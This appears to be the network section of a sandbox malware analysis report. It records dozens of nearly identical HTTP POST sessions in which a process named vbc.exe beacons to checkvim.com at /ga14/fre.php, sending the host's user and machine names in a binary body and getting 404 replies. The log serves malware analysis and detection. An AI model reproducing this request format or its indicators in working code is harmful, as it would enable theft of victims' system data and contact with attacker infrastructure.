                    Sep 28, 2021 06:51:59.051476002 CEST404OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:59.345117092 CEST405INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:52:10 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    135192.168.2.22493005.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:51:59.614892960 CEST406OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:51:59.681755066 CEST406OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:51:59.962507963 CEST406INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:52:11 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    136192.168.2.22493015.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:52:00.216200113 CEST407OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:52:00.279129982 CEST407OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:52:00.608645916 CEST408INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:52:11 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    137192.168.2.22493025.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:52:00.868429899 CEST408OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:52:00.941271067 CEST409OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:52:01.292341948 CEST409INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:52:12 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    138192.168.2.22493035.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:52:01.551019907 CEST410OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:52:01.614779949 CEST410OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:52:01.903731108 CEST410INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:52:13 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    139192.168.2.22493045.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:52:02.176567078 CEST411OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:52:02.243386030 CEST411OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:52:02.597537041 CEST412INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:52:13 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    14192.168.2.22491795.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:41.640229940 CEST238OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:41.711805105 CEST238OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:50:42.012145042 CEST239INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:53 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    140192.168.2.22493055.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:52:02.873689890 CEST413OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:52:02.950542927 CEST413OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:52:03.258858919 CEST413INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:52:14 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    141192.168.2.22493065.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:52:03.533926964 CEST414OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:52:03.606951952 CEST414OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:52:03.883480072 CEST414INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:52:15 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    142192.168.2.22493075.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:52:04.134812117 CEST415OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:52:04.202033997 CEST416OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:52:04.492880106 CEST416INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:52:15 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    15192.168.2.22491805.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:42.299756050 CEST239OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:42.367993116 CEST240OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:50:42.665060043 CEST240INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:54 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    16192.168.2.22491815.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:42.959615946 CEST241OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:43.030869961 CEST241OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:50:43.342381954 CEST241INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:54 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    17192.168.2.22491825.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:43.668917894 CEST242OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:43.748574018 CEST242OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:50:44.033987999 CEST243INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:55 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    18192.168.2.22491835.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:44.317406893 CEST243OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:44.385127068 CEST244OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:50:44.690879107 CEST244INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:56 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    19192.168.2.22491845.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:44.980669022 CEST245OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:45.043817043 CEST245OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:50:45.327651024 CEST245INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:56 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    2192.168.2.22491675.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:30.225629091 CEST221OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 176
                    Connection: close
                    Sep 28, 2021 06:50:30.288781881 CEST222OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: 'ckav.ruAlbus367706ALBUS-PC+0DE4229FCF97F5879F50F8FD3mSQjR
                    Sep 28, 2021 06:50:30.580647945 CEST222INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:41 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 15
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    20192.168.2.22491855.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:45.606333017 CEST246OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:45.679836988 CEST246OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:50:45.970263958 CEST247INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:57 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    21192.168.2.22491865.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:46.257925987 CEST248OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:46.329224110 CEST248OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:50:46.621850967 CEST248INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:57 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    22192.168.2.22491875.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:46.934037924 CEST249OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:47.007925034 CEST249OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:50:47.284598112 CEST250INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:58 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    23192.168.2.22491885.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:47.567337990 CEST250OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
                    Sep 28, 2021 06:50:47.638931990 CEST251OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                    Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                    Sep 28, 2021 06:50:47.929215908 CEST251INHTTP/1.0 404 Not Found
                    Date: Tue, 28 Sep 2021 04:50:59 GMT
                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                    X-Powered-By: PHP/5.4.16
                    Status: 404 Not Found
                    Content-Length: 23
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                    Data Ascii: File not found.


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    24192.168.2.22491895.188.89.5080C:\Users\Public\vbc.exe
                    TimestampkBytes transferredDirectionData
                    Sep 28, 2021 06:50:48.217751026 CEST252OUTPOST /ga14/fre.php HTTP/1.0
                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                    Host: checkvim.com
                    Accept: */*
                    Content-Type: application/octet-stream
                    Content-Encoding: binary
                    Content-Key: 66369A18
                    Content-Length: 149
                    Connection: close
